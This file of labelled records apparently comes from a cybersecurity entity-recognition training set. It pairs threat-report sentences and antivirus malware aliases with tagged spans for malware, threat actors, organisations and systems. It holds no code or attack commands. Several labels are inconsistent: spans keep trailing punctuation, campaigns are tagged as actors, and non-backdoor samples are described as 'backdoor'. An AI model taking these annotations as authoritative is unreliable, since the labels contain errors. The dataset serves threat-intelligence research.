{"text": "A backdoor also known as: Trojan.Skeeyah Trojan.KillDisk.Win32.208 Trojan/KillDisk.nbh Win32.Trojan.WisdomEyes.16070401.9500.9834 Trojan.Disakil Win.Trojan.KillDisk-3 Trojan.Win32.KillDisk.fw Win32.Trojan.Killdisk.Pgmq Trojan:Win32/KillDisk.N!dha Trojan.KillDisk.1 Trojan.Win32.KillDisk.fw Trojan/Win32.KillDisk.C1706046 Trojan.KillDisk Win32/KillDisk.NBH Trojan.KillDisk!B1yc+Gvh2zs Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002537", "source": "cyner2_train"}}
{"text": "The normal lifecycle of an Office exploit starts with the initial use in targeted attacks.", "spans": {"VULNERABILITY: an Office exploit": [[24, 41]]}, "info": {"id": "cyner2_train_002539", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PSW.Win32.LdPinch!O TrojanPWS.Ldpinch Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/Tnega.YML TSPY_LDPINCH_DD3005CF.UVPA Trojan-PSW.Win32.LdPinch.guf Trojan.Win32.LdPinch.crgdkw Trojan.LdPinch.Win32.5281 BehavesLike.Win32.Trojan.fz Trojan.Win32.Vilsel W32/Trojan.JQPI-8861 Trojan/PSW.LdPinch.pxf Trojan[PSW]/Win32.LdPinch Trojan.Heur.E4E165 Troj.Psw.W32.Ldpinch!c Trojan-PSW.Win32.LdPinch.guf PWS:Win32/Phorex.A Trojan/Win32.LdPinch.R68731 Trojan.PWS.LdPinch!MPU8gCWOSOw W32/LdPinch.GUF!tr.pws TrojanPSW.Pinch Win32/Trojan.PSW.b93", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002541", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.QQRob.NBU Trojan-PSW.Win32.QQPass!O PSW.QQPass.13953 Trojan.PWS.QQRob.NBU Trojan/PSW.QQPass.ban Win32.Worm.Autorun.ar Infostealer.QQRob.A WORM_AUTORUN.EDD Win.Trojan.QQPass-84 Trojan.PWS.QQRob.NBU Trojan-PSW.Win32.QQPass.ban Trojan.PWS.QQRob.NBU Trojan.Win32.QQPass.btqyi Trojan.Win32.Z.Qqpass.73427 Trojan.Tencent/Variant Trojan.PWS.QQRob.NBU TrojWare.Win32.PSW.QQPass.~GK Trojan.PWS.Qqpass.1364 WORM_AUTORUN.EDD BehavesLike.Win32.PWSQQGame.lh W32/Pws.VYB Trojan/PSW.QQPass.bhp Win32.Troj.QQPswT.bs.116858 Trojan.PWS.QQRob.NBU Troj.Psw.W32.Qqpass!c Trojan-PSW.Win32.QQPass.ban MalwareScope.Trojan-PSW.Game.7 Trj/QQPass.AOI Win32.Trojan-qqpass.Qqrob.Pcsk Trojan-Dropper.Win32.Delf W32/Dropper.DLF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002542", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.BHO.89848 Trojan/BHO.gzx TSPY_BZUB.CN Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.FNXB TSPY_BZUB.CN Win.Trojan.Bho-4826 Trojan.Win32.BHO.gzx Trojan.Win32.BHO.cqlbw TrojWare.Win32.BHO.SR Trojan.MulDrop.20001 Trojan.BHO.Win32.3053 BehavesLike.Win32.Backdoor.mc W32/Trojan.RKCQ-8049 Trojan/BHO.csn Win32.Troj.BHO.kcloud Trojan.Heur.RP.E89CDE Trojan.Win32.BHO.gzx PWS:Win32/Cimuz.J Trojan/Win32.Inject.C94649 Trojan.BHO Win32/Spy.BZub.NFS Trojan.BHO!Tkmwppjy1xw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002543", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.VB!O TrojanDownloader.VB Troj.Banker.W32.Bancos.lgUF Trojan/Downloader.VB.iro Win32.Trojan.WisdomEyes.16070401.9500.9935 Win32/SillyDl.GEF Win.Trojan.Downloader-37507 Trojan-Downloader.Win32.VB.iro Trojan.Win32.VB.vrga Trojan.Win32.Downloader.69122.B TrojWare.Win32.Banker.etk74 Trojan.Show.34817 Downloader.VB.Win32.114 WORM_IRCBOT.SMOK BehavesLike.Win32.YahLover.ct TrojanDownloader.VB.gvh Trojan[Downloader]/Win32.VB Trojan-Downloader.Win32.VB.iro DoS:Win32/Pokanti.A Downloader/Win32.VB.R6537 TScope.Trojan.VB Win32.Trojan-downloader.Vb.Pdmc Trojan.DL.VB!zHigarbFEUc Trojan-Downloader.Win32.VB Win32/Trojan.Downloader.b8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002545", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Dropper.GO W97M/Downloader.aho W2KM_DLOADE.VHC Trojan.Script.MLW.dsmnja W2KM_DLOADE.VHC W97M/Downloader.aho HEUR.VBA.Trojan macro.ole.encodedownload.g", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002546", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.PornoBlocker!O Trojan/PornoBlocker.adki Win32.Virus.Krap.a HV_RANSOM_CA222F78.TOMC Win.Trojan.Kryptik-1359 Trojan-Ransom.Win32.PornoBlocker.adki Trojan.Win32.Butirat.wyaex Trojan.Win32.A.PornoBlocker.197120.B ApplicUnwnt.Win32.Hoax.ArchSMS.SG BackDoor.Butirat.51 BehavesLike.Win32.PUPXAG.ch Trojan/PornoBlocker.chv Trojan[Ransom]/Win32.PornoBlocker Trojan.Kazy.DCA1D Trojan-Ransom.Win32.PornoBlocker.adki Trojan:Win32/Waprox.A Trojan/Win32.PornoBlocker.C156437 Hoax.PornoBlocker Trj/Pacrypt.D Trojan.PornoBlocker!0B81yxGeAIw Trojan.Win32.Waprox W32/Zbot.RO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002548", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VBS.UAJ Trojan.VBS.UAJ Win32.Trojan.WisdomEyes.16070401.9500.9853 Trojan.VBS.UAJ Vbs.Trojan.Vbs.Ljjs Trojan.VBS.UAJ Trojan.VBS.UAJ Trojan.DownLoader19.25627 BehavesLike.Win32.Downloader.qh Trojan.Barys Trojan.MSIL.amcc Trojan.VBS.UAJ Trojan.VBS.UAJ Trojan.MSIL.Zapchast VBS/Shutdown.NAH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002549", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RTKT_SMALL.NLA RTKT_SMALL.NLA Trojan.Win32.Small.dplckv Adware.AdLoad.Win32.8710 BehavesLike.Win32.PUPXAX.lc Trojan.Zusy.D2BE63 Rootkit.Small!rTi0K4xzlKc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002550", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VodyDmpA.Worm Trojan/W32.Small.9265 RiskWare.Tool.CK Trojan/Pakes.c Win32.Trojan.WisdomEyes.151026.9950.9983 W32/Trojan.WZX TROJ_PAKES.JV Virus.Win32.Xorer.a Trojan.Win32.Pakes.bovph Trojan.Win32.Pakes.9261[h] Trojan.Dropper/Packed Win32.Virus.Xorer.Pkqs TrojWare.Win32.Patched.KSU Trojan.Rox Virus.Xorer.Win32.101 TROJ_PAKES.JV BehavesLike.Win32.Downloader.zc W32/Trojan.YUJV-5997 W32/Pakes.C!tr W32.Xorer.a!c Win-Trojan/Pakes.9265 Trojan.Pakes Virus.Win32.Xorer Clicker.BEHT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002552", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.GamesonTBDll1.Trojan Trojan.PWS.OnlineGames.ZLU Trojan-PWS/W32.WebGame.229376.BS Trojan.Tilcun.B7 Trojan.PWS.OnlineGames.ZLU Trojan/OnLineGames.arus TSPY_ONLINEG.FGF Win32.Trojan-PSW.OLGames.cc Infostealer.Gampass TSPY_ONLINEG.FGF Win.Spyware.45047-2 Trojan.PWS.OnlineGames.ZLU Trojan.PWS.OnlineGames.ZLU Trojan.Win32.OnLineGames.bemmm Trojan.Win32.PSWIGames.229376.Q Trojan.PWS.OnlineGames.ZLU TrojWare.Win32.PSW.OnLineGames.NOA Trojan.PWS.OnlineGames.ZLU Trojan.PWS.Gamania.11506 BehavesLike.Win32.Downloader.dh Trojan.Win32.Tilcun TR/Tilcun.B Win32.Troj.OnlineGameT.na.218624 Trojan.PWS.OnlineGames.ZLU Troj.GameThief.W32.OnLineGames.arus!c Trojan/Win32.OnlineGameHack.R2107 PWS-OnlineGames.br BScope.Trojan-PSW.Gomex.22 Win32/PSW.OnLineGames.NOA Win32.GamePsw.OnlineGame.bscx W32/OnLineGames.AKLO!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002554", "source": "cyner2_train"}}
{"text": "BlackMoon Trojan is a banking trojan that is designed to phish user credentials from various South Korean banking institutions.", "spans": {"MALWARE: BlackMoon Trojan": [[0, 16]], "MALWARE: banking trojan": [[22, 36]], "ORGANIZATION: banking institutions.": [[106, 127]]}, "info": {"id": "cyner2_train_002556", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Script.9271 BAT.Trojan.KillFiles.h Win.Worm.530490-1 BAT.Conwonk BehavesLike.Win64.Downloader.qh BAT/KillWin.NAR Trojan.BAT.KillWin BAT/KillWin.NAR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002557", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Patched.Shopperz.1 Trojan.DllPatcher.A6 PTCH64_NOPLE.SM Trojan.Mentono!inf PTCH64_NOPLE.SM Trojan.Patched.Shopperz.1 Trojan.Win64.Patched.qw Trojan.Patched.Shopperz.1 Trojan.Patched.Shopperz.1 Trojan.Hosts.37524 Trojan.Patched.Shopperz Trojan/Win64.Patched.ap Trojan.Patched.Shopperz.1 Trojan.Win64.Patched.qw W64/Patched.AP!tr Win32/Trojan.133", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002558", "source": "cyner2_train"}}
{"text": "A malicious Word document targeting Mac users.", "spans": {"SYSTEM: Mac users.": [[36, 46]]}, "info": {"id": "cyner2_train_002559", "source": "cyner2_train"}}
{"text": "It also targets Ahnlab by killing processes and deleting files specific to the software.", "spans": {"ORGANIZATION: Ahnlab": [[16, 22]], "SYSTEM: software.": [[79, 88]]}, "info": {"id": "cyner2_train_002560", "source": "cyner2_train"}}
{"text": "BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.", "spans": {"THREAT_ACTOR: BlackTech": [[0, 9]], "THREAT_ACTOR: cyber espionage group": [[15, 36]]}, "info": {"id": "cyner2_train_002561", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Affpach.A4 Trojan.Graftor.D6130 Win32.Trojan.StartPage.a W32/Trojan2.NTSB TROJ_SPNR.30BF13 Trojan.Win32.AVKill.bfnuts Trojan.Win32.Inject.tja Trojan.AVKill.27746 TROJ_SPNR.30BF13 W32/Trojan.ZXAC-7369 Variant.Graftor.xm Win32/StartPage.OKV Trojan.StartPage!m0gBcMRinXU Trojan.Hijacker W32/StartPage.OKV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002563", "source": "cyner2_train"}}
{"text": "Threat Actors TAs employ sophisticated techniques to create phishing websites that are designed to appear legitimate and attractive to users.", "spans": {"THREAT_ACTOR: Threat Actors TAs": [[0, 17]]}, "info": {"id": "cyner2_train_002564", "source": "cyner2_train"}}
{"text": "BianLian continues to exhibit a high level of operational security and skill in network penetration, seeming to have also found their stride in the pace of their operations.", "spans": {}, "info": {"id": "cyner2_train_002565", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VEX8687.Webshell Backdoor.PHP.RST.H HTML.BackDoor.A Backdoor.Php.Rst!c PHP.Backdoor.WebShell.al PHP/Rst.H PHP.RSTBackdoor PHP/Small.NAL PHP_R57SHELL.SM Win.Trojan.R57-2 Script.Trojan.PHPShellRST.A Backdoor.PHP.RST.H Trojan.Html.Rst.bgzarv PHP.S.Rst.87741 Backdoor.PHP.RST.H Backdoor.PHP.Rst.~BBA Backdoor.PHP.RST.H PHP.R57Shell.12 PHP_R57SHELL.SM PHP/Rst.H PHP/Rst.H.95982 Backdoor.PHP.RST.H PHP/Rst.A Backdoor.PHP.r57Shell.A BPX.Shell Backdoor.PHP.Rst.ai Php.Backdoor.Rst.Ssgx PHP.RST.G Trojan.PHP.Rst PHP/Rst.AI!tr php.script.c99shell.6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002566", "source": "cyner2_train"}}
{"text": "Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: group": [[32, 37]], "MALWARE: Trojan": [[127, 133]], "MALWARE: ISMDoor.": [[141, 149]]}, "info": {"id": "cyner2_train_002567", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Adware.AMRL Trojan.DownLoader22.55869 BehavesLike.Win32.Worm.th W32/Adware.OAXQ-2836 Worm:Win32/Imafly.AC Trojan.Strictor.D19956 Trojan/Win32.Cosmu.R158790 Win32/Autoit.LH Worm.Win32.AutoIt W32/Autoit.EQP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002570", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Worm.Goldrv.A7 Trojan-Ransom.Win32.Blocker.jaic Trojan.Win32.Dapato.dbzcxx W32.Virut.lMey Trojan.Win32.Dapato.a TrojWare.Win32.Dapato.DFS Trojan.DownLoader11.18798 Trojan-Dropper.Win32.Dapato TrojanDropper.Dapato.peb Trojan[Dropper]/Win32.Dapato Worm:Win32/Goldrv.A Trojan-Ransom.Win32.Blocker.jaic HEUR/Fakon.mwf Trojan-Ransom.Blocker Backdoor.Bot W32/Dapato.EDU!tr Win32/Trojan.df8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002571", "source": "cyner2_train"}}
{"text": "The malware used in this campaign has similar features to that distributed earlier in 2017 with the following changes: A new decoy document copy/pasted from an article published on the 3rd of July by Yonhap News Agency in Korea;", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: campaign": [[25, 33]], "ORGANIZATION: Yonhap News Agency": [[200, 218]]}, "info": {"id": "cyner2_train_002572", "source": "cyner2_train"}}
{"text": "The Computer Incident Response Center Luxembourg CIRCL has recently uncovered malicious files attached to an email through the use of Pandora Document and File Analysis.", "spans": {"ORGANIZATION: The Computer Incident Response Center Luxembourg CIRCL": [[0, 54]]}, "info": {"id": "cyner2_train_002575", "source": "cyner2_train"}}
{"text": "New variant of the Android rootnik malware that disguises itself as a legal app.", "spans": {"MALWARE: variant": [[4, 11]], "MALWARE: Android rootnik malware": [[19, 42]], "SYSTEM: legal app.": [[70, 80]]}, "info": {"id": "cyner2_train_002576", "source": "cyner2_train"}}
{"text": "Using google translate, I found that the language is Armenian and translates to The Law on Banks and Banking 27.07.2015.doc VirusTotal intelligence spotted the decoy in the wild as an email attachment with the subject name Law changes which gave me a suspicion that the attempt was made to specifically target the employees of Central bank of Armenia.", "spans": {"SYSTEM: google translate,": [[6, 23]], "ORGANIZATION: VirusTotal intelligence": [[124, 147]], "ORGANIZATION: employees": [[314, 323]], "ORGANIZATION: Central bank of Armenia.": [[327, 351]]}, "info": {"id": "cyner2_train_002577", "source": "cyner2_train"}}
{"text": "Everything started from a well edited Italian language email given to me from a colleague of mine, thank you Luca! reaching out many Italian companies.", "spans": {"ORGANIZATION: Italian companies.": [[133, 151]]}, "info": {"id": "cyner2_train_002579", "source": "cyner2_train"}}
{"text": "BEBLOH is a banking Trojan that has been around since as early as 2009.", "spans": {"MALWARE: BEBLOH": [[0, 6]], "MALWARE: banking Trojan": [[12, 26]]}, "info": {"id": "cyner2_train_002580", "source": "cyner2_train"}}
{"text": "The actor utilizes spear phishing campaigns to deliver NetTraveler, also known as TravNet.", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "THREAT_ACTOR: spear phishing campaigns": [[19, 43]], "MALWARE: NetTraveler,": [[55, 67]], "MALWARE: TravNet.": [[82, 90]]}, "info": {"id": "cyner2_train_002581", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.PcClient.409260 Trojan.Pincav.9356 Backdoor.PcClient.Win32.5 Backdoor/PcClient.alqk Trojan.Buzy.D10B5 W32/Backdoor.MMJP-0040 Backdoor.Trojan Trojan.Win32.PcClient.ihgd Trojan.MulDrop3.45818 Backdoor.Win32.PcClient W32/Backdoor2.FUIH Trojan:Win32/Wisp.A BDS/Pcclient.alqk Trojan[Backdoor]/Win32.PcClient Backdoor.Win32.A.PcClient.386732 Trojan/Win32.PcClient.R55121 Backdoor.PcClient Backdoor.PcClient!4LPCxDv4AHg Win32/Backdoor.851", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002582", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 BehavesLike.Win64.MysticCompressor.ch Trojan:Win64/Jifcapi.A Win32/Trojan.03e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002584", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.PWS.Steam.12700 BehavesLike.Win32.Trojan.bc TR/Dropper.MSIL.dhgqe Spyware.AzorUlt Trj/GdSda.A Trojan.MSIL.Krypt MSIL/Kryptik.MPY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002585", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AlustinH.Trojan Trojan.Diacam.KL3 Trojan.VB.Win32.96905 Trojan/VB.qms TROJ_DIACAM_BK0846C6.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9992 TROJ_DIACAM_BK0846C6.TOMC Win.Trojan.Mokes-11 Trojan.Win32.Dwn.coomze TrojWare.Win32.VB.QMS Trojan.DownLoader6.45576 Trojan/Jorik.glae Trojan/Win32.Mokes Trojan:Win32/Diacam.A Trojan.Symmi.D23C3 Win32.Trojan.VB.BE Trojan/Win32.VBKrypt.C161437 Trojan.Mokes Win32/VB.QMS Win32.VBCrypt W32/VBKrypt.MBSX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002587", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Packed.16 Win32/Pigeon.AZTT Win.Trojan.Packed-77 Backdoor.Win32.Hupigon.oqk Trojan.Win32.Crypt.mkur Backdoor.Win32.Hupigon.412672.K Win32.Backdoor.Hupigon.cuda Packed.Win32.Klone.~KMF BackDoor.Pigeon.20533 Backdoor.Hupigon.Win32.100099 BehavesLike.Win32.Fujacks.fc Backdoor/Hupigon.af Win32.Troj.Klone.ab.389660 Trojan/Win32.Malpacked5.R134022 Trojan-Dropper.Kaos Trojan.Win32.Pincav", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002588", "source": "cyner2_train"}}
{"text": "In some cases, it appeared to be a single use domain shadowing which is incredibly difficult to stop by using blacklisting.", "spans": {}, "info": {"id": "cyner2_train_002589", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.VP.ED105D0 Win32.Trojan.WisdomEyes.16070401.9500.9911 Trojan.MulDrop4.19536 BehavesLike.Win32.VBObfus.nt TR/Spy.36864.1691 Win32/VB.OIX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002590", "source": "cyner2_train"}}
{"text": "Since our first published analysis of the OilRig campaign in May 2016 Unit42 has continued to monitor this group for new activity.", "spans": {"THREAT_ACTOR: the OilRig campaign": [[38, 57]], "ORGANIZATION: Unit42": [[70, 76]], "THREAT_ACTOR: group": [[107, 112]]}, "info": {"id": "cyner2_train_002591", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Dapato!O Trojan.Symmi.D6404 Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan-Dropper.Win32.Dapato.buqu Trojan.Win32.Dapato.bcmajb Trojan.DownLoader7.19485 BehavesLike.Win32.BadFile.mm W32/Trojan.IAVK-8796 TrojanDropper.Dapato.mbp TR/Dapato.AG Win32.Troj.Dapato.bu.kcloud Trojan:Win32/Omdork.A Trojan-Dropper.Win32.Dapato.buqu Trojan/Win32.Inject.R46970 Trojan.Win32.Swisyn W32/Dapato.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002592", "source": "cyner2_train"}}
{"text": "More and more we've been seeing references to a malware family known as FormBook.", "spans": {"MALWARE: a malware family": [[46, 62]], "MALWARE: FormBook.": [[72, 81]]}, "info": {"id": "cyner2_train_002593", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.6632 PUP.Optional.Nosibay TROJ_GE.FF4D51A5 Adware.Downware.11318 virus.win32.sality.at PUA/BubbleDock.A PUP.Nosibay/Variant NSIS.Application.SilentInstaller.A Win32.Trojan.Bubbledock.Huzb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002595", "source": "cyner2_train"}}
{"text": "These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.", "spans": {"SYSTEM: Google Play store,": [[37, 55]]}, "info": {"id": "cyner2_train_002599", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan.PWS.Banker1.23807 TR/Crypt.ZPACK.qkbzo Trojan:Win32/Ahriynoteemo.A Trojan-Spy.Win32.Noon Trj/CI.A Win32/Trojan.1fa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002601", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Trojan.Mauvaise.SL1 Trojan.Skeeyah W32.SillyFDC Trojan.Win32.Bulknet.eljnif TrojWare.Win32.Imwee.A Trojan.DownLoader11.19812 Trojan.Zusy.D38629 TrojanDownloader:Win32/Gratem.A HEUR/Fakon.mwf Trj/Downloader.WKR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002604", "source": "cyner2_train"}}
{"text": "A worm Madang infects files across all drives, and installs itself as serverx.exe", "spans": {"MALWARE: worm Madang": [[2, 13]], "SYSTEM: drives,": [[39, 46]]}, "info": {"id": "cyner2_train_002605", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MosquitoQKB.Fam.Trojan Trojan.Kryptik.Win32.93516 Trojan/Kryptik.kuf BKDR_QAKBOT.SMG Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_QAKBOT.SMG Win.Trojan.5453446-1 Trojan-Ransom.Win32.Gimemo.dtt Trojan.Win32.Crypted.efbdjj Trojan.Packed.21485 BehavesLike.Win32.HLLP.dc Trojan:Win32/Dishigy.B Trojan-Ransom.Win32.Gimemo.dtt Trojan/Win32.Zbot.R2835 Trojan.Flasher.xr Worm.Win32.Slenfbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002606", "source": "cyner2_train"}}
{"text": "This attack was specifically targeting a well-known financial services firm.", "spans": {"ORGANIZATION: financial services firm.": [[52, 76]]}, "info": {"id": "cyner2_train_002607", "source": "cyner2_train"}}
{"text": "Cmstar was named for the log message CM**' used by the downloader.", "spans": {"MALWARE: Cmstar": [[0, 6]], "MALWARE: downloader.": [[55, 66]]}, "info": {"id": "cyner2_train_002608", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.ASP.Ace.B Backdoor.ASP.Ace.B ASP/Ace.C Backdoor.Trojan Ace.B HTML_Haiyasp.a Backdoor.ASP.Ace.b Backdoor.ASP.Ace.B Backdoor.ASP.Ace.b Backdoor.ASP.Ace.B BDS/ASP.Ace.E HTML_Haiyasp.a Backdoor/ASP.Ace.b Backdoor/ASP.Ace Backdoor:ASP/Ace.B Backdoor.ASP.Ace.B ASP/Ace.C Backdoor.ASP.Ace.b Backdoor.Trojan ASP/Ace.B Script.haiyang.a Bck/Ace.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002611", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.NtRootKit.bozxzq TrojWare.Win32.Rootkit.Festi.AA Trojan.NtRootKit.15667 BehavesLike.Win32.Dropper.mm Trojan.Win32.Rootkit Trojan[Rootkit]/Win32.Tent TrojanDropper:Win32/Festi.C SScope.Trojan.CLR.18907 W32/Rootkit_Festi.AA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002614", "source": "cyner2_train"}}
{"text": "In-depth reverse engineering revealed the APK contained an Android variant of X-Agent, the command and control protocol was closely linked to observed Windows variants of X-Agent, and utilized a cryptographic algorithm called RC4 with a very similar 50 byte base key.", "spans": {"SYSTEM: APK": [[42, 45]], "MALWARE: Android variant of X-Agent,": [[59, 86]], "SYSTEM: Windows": [[151, 158]], "MALWARE: variants of X-Agent,": [[159, 179]]}, "info": {"id": "cyner2_train_002615", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Cidox!O Trojan/Cidox.bpa TROJ_VUNDO.SMFQ Win32.Trojan.WisdomEyes.16070401.9500.9988 TROJ_VUNDO.SMFQ Trojan.Win32.Mayachok.esnzar Trojan.Mayachok.1 Dropper.Cidox.Win32.14633 BehavesLike.Win32.PUPXDR.ph Trojan-Dropper.Win32.Cidox Trojan.Symmi.DD688 TrojanDownloader:Win32/Vundo.HIY Trojan/Win32.Cidox.R20237 Trojan-Ransom.Cidox.1212 Win32/Trojan.1b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002616", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Virut.G W32/Trojan3.ATP W32.Virut.CF W32/Virut.BS Win32/Virut.17408 PE_VIRUX.A-3 Virus.Win32.Virut.ce Win32.Virut.AM Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.A-3 Heuristic.BehavesLike.Win32.ModifiedUPX.J Win32/Virut.bn Win32.Virut.nd.53248 Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan3.ATP Virus.Virut.06 Win32/Virut.NBP Win32.Obduran.a W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002617", "source": "cyner2_train"}}
{"text": "It then uses open-sourced Android root exploit tools to gain root access on an Android device.", "spans": {"MALWARE: Android root exploit tools": [[26, 52]], "VULNERABILITY: gain root access": [[56, 72]], "SYSTEM: Android device.": [[79, 94]]}, "info": {"id": "cyner2_train_002618", "source": "cyner2_train"}}
{"text": "The actors weaponized the delivery document to install a variant of the 9002' Trojan called 3102' that heavily relies on plugins to provide functionality needed by the actors to carry out on their objectives.", "spans": {"THREAT_ACTOR: The actors": [[0, 10]], "MALWARE: Trojan": [[78, 84]], "MALWARE: 3102'": [[92, 97]], "THREAT_ACTOR: actors": [[168, 174]]}, "info": {"id": "cyner2_train_002619", "source": "cyner2_train"}}
{"text": "Spearphishes impersonating RAND", "spans": {"ORGANIZATION: RAND": [[27, 31]]}, "info": {"id": "cyner2_train_002620", "source": "cyner2_train"}}
{"text": "KeyRaider targets jailbroken iOS devices and is distributed through third-party Cydia repositories in China.", "spans": {"MALWARE: KeyRaider": [[0, 9]], "VULNERABILITY: jailbroken": [[18, 28]], "SYSTEM: iOS devices": [[29, 40]], "SYSTEM: Cydia repositories": [[80, 98]]}, "info": {"id": "cyner2_train_002621", "source": "cyner2_train"}}
{"text": "The malware, dubbed CopyCat by researchers, uses a novel technique to generate and steal ad revenues.", "spans": {"MALWARE: malware,": [[4, 12]], "MALWARE: CopyCat": [[20, 27]], "ORGANIZATION: researchers,": [[31, 43]]}, "info": {"id": "cyner2_train_002622", "source": "cyner2_train"}}
{"text": "The criminal gangs of the Carbanak/FIN7 syndicate have been attributed to numerous intrusions in the banking, hospitality, retail and other industrial verticals, collecting financial information of all kinds.", "spans": {"THREAT_ACTOR: The criminal gangs": [[0, 18]], "THREAT_ACTOR: the Carbanak/FIN7 syndicate": [[22, 49]], "ORGANIZATION: the banking, hospitality, retail": [[97, 129]], "ORGANIZATION: other industrial verticals,": [[134, 161]]}, "info": {"id": "cyner2_train_002624", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 LNK/Trojan.XMFH-4 Worm.Win32.AutoIt.aku Worm.W32.Autoit!c LNK_DORKBOT.SMF Trojan/Win32.Autoit Trojan.Autoit.DHZ Worm.Win32.AutoIt.aku Trojan:Win32/Chinqincin.A Win32.Worm.Autoit.Lndx Trj/CI.A Win32/Trojan.1e1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002625", "source": "cyner2_train"}}
{"text": "However, only the Georgian language portion of the website was impacted and used in an effort to distribute malware.", "spans": {"MALWARE: malware.": [[108, 116]]}, "info": {"id": "cyner2_train_002627", "source": "cyner2_train"}}
